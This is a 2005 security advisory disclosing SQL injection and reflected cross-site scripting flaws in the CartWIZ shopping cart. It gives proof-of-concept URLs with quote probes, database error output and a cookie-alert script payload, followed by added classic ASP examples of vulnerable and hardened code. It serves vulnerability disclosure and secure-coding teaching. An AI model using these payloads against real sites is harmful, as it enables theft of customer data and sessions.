[HSC] [Bday Release] CartWIZ
HSC Research Group - Advisories
Written by Hackers Center   
Thursday, 07 July 2005 15:14
Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO [address hidden by the site's spam protection]
******************************

Get Dcrab's services to audit your web servers, scripts, networks, etc., or even to code them. Learn more at http://www.dbtech.org

Severity: High
Title: CartWIZ shopping cart has multiple SQL injection and cross-site scripting vulnerabilities
Date: 8/07/2005

Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com/
Vendor Status: Contacted but no reply
Summary: There are multiple SQL injection and cross-site scripting vulnerabilities in CartWIZ Shopping Cart


Proof of Concept Exploits:

www.site.com/cartwiz/store/tellAFriend.asp?idProduct='
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

/cartwiz/store/tellAFriend.asp, line 71


www.site.com/cartwiz/store/viewSupportTickets.asp?sortType='&sortOrder=ticketNum&page=0
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

www.site.com/cartwiz/store/viewSupportTickets.asp, line 149


www.site.com/cartwiz/store/updateCreditCards.asp?id='
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and idCustomer=1'.

/cartwiz/store/updateCreditCards.asp, line 31


www.site.com/cartwiz/store/deleteCreditCards.asp?id='
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

www.site.com/cartwiz/store/deleteCreditCards.asp, line 27
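The four SQL injection entries above share one root cause: a query-string value (idProduct, id, sortType) is spliced into the SQL text, and when a stray quote breaks the statement the ODBC provider's error is rendered straight to the browser. The classic ASP (VBScript) fragment below is an added illustration of the vulnerable pattern next to a hardened version; it is not CartWIZ source and not from the advisory's author. It binds the id as a typed ADODB parameter and maps the sort column onto a whitelist, because ORDER BY column names cannot be bound as parameters. Table and column names (products, supportTickets, description, dateOpened), the Application("connString") setting and /error.asp are assumptions.

```asp
<%
Option Explicit
' Illustrative classic ASP (VBScript) rewrite of the pattern behind the SQL
' injection entries above. NOT CartWIZ source. Table and column names,
' Application("connString") and /error.asp are assumptions.

Dim idProductRaw, sortTypeRaw, orderBy, re, conn, cmd, rs
idProductRaw = Request.QueryString("idProduct")
sortTypeRaw  = Request.QueryString("sortType")

' ---- Vulnerable pattern (kept as a comment so it is never executed) ----
' The raw value becomes part of the SQL text, so a quote in idProduct or
' sortType changes the statement and SQL Server answers with error 80040e14:
' sql = "SELECT * FROM products WHERE idProduct=" & idProductRaw
' sql = "SELECT * FROM supportTickets ORDER BY " & sortTypeRaw

' ---- Hardened version ----

' 1. Reject anything that is not the shape of a product id (1 to 9 digits).
'    Reject rather than "clean": a stripped value is still untrusted input.
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(idProductRaw) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' 2. ORDER BY columns cannot be bound as parameters, so map sortType onto a
'    whitelist; orderBy only ever holds a literal written in this file.
Select Case LCase(sortTypeRaw)
    Case "ticketnum": orderBy = "ticketNum"
    Case "date":      orderBy = "dateOpened"
    Case Else:        orderBy = "ticketNum"   ' safe default for unknown values
End Select
' ... "SELECT ... FROM supportTickets ORDER BY " & orderBy is now safe to build.

' 3. Bind the id as a typed parameter; the value never enters the SQL text.
On Error Resume Next
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("connString")

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1   ' adCmdText
cmd.CommandText = "SELECT idProduct, description FROM products WHERE idProduct = ?"
cmd.Parameters.Append cmd.CreateParameter("idProduct", 3, 1, 4, CLng(idProductRaw))   ' adInteger, adParamInput
Set rs = cmd.Execute

' 4. Never let the provider's error text reach the client. Log it server-side
'    and show a generic page instead of the "80040e14" dump quoted above.
If Err.Number <> 0 Then
    ' write Err.Description to the application log here
    Err.Clear
    Response.Redirect "/error.asp"
End If

Do While Not rs.EOF
    Response.Write Server.HTMLEncode(rs("description") & "") & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The in-page error handling only helps if IIS is also configured not to send detailed ASP error messages to the browser; with that option left on, the provider text with the script path and line number (exactly what the advisory quotes) is returned on any unhandled error.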


www.site.com/cartWiz/store/login.asp?message=><script>alert(document.cookie);</script>&redirect=%2FcartWiz%2Fstore%2FmyAccount%2Easp
Cross Site Scripting
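The login page finding above is a reflected cross-site scripting issue: the message parameter is written into the page as markup. The classic ASP (VBScript) fragment below is an added illustration, not CartWIZ source and not from the advisory's author; it shows the vulnerable write next to a version that HTML-encodes at the point of output. The notice markup and the 200-character cap are assumptions.

```asp
<%
Option Explicit
' Illustrative classic ASP (VBScript) handling of a reflected "message"
' parameter on a login page. NOT CartWIZ source; the notice markup and the
' 200-character cap are assumptions.

Dim message
message = Request.QueryString("message")

' ---- Vulnerable pattern (kept as a comment so it is never executed) ----
' Whatever arrives in the query string becomes part of the HTML, so markup
' supplied by a link (as in the PoC above) runs in the visitor's browser:
' Response.Write "<p class=""notice"">" & message & "</p>"

' ---- Hardened version ----
' Cap the length (notices are short) and encode at the moment of output.
' Server.HTMLEncode turns <, >, & and " into entities, so the value renders
' as text regardless of its contents. It does not encode the single quote,
' so any attribute that receives the value must be double-quoted, as below.
If Len(message) > 200 Then message = Left(message, 200)

Response.Write "<p class=""notice"">" & Server.HTMLEncode(message) & "</p>"
Response.Write "<input type=""hidden"" name=""message"" value=""" & Server.HTMLEncode(message) & """>"

' Encoding belongs at the output sink, not at input: the same value may later
' be stored or logged, and each sink needs the encoding appropriate to it.
%>
```

Encoding the value fixes the reflection; it does not make the session cookie safe from other script on the page, so the cookie should additionally carry the HttpOnly flag where the platform allows it.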


Keep yourself updated: RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon-to-come-out book on secure coding with PHP.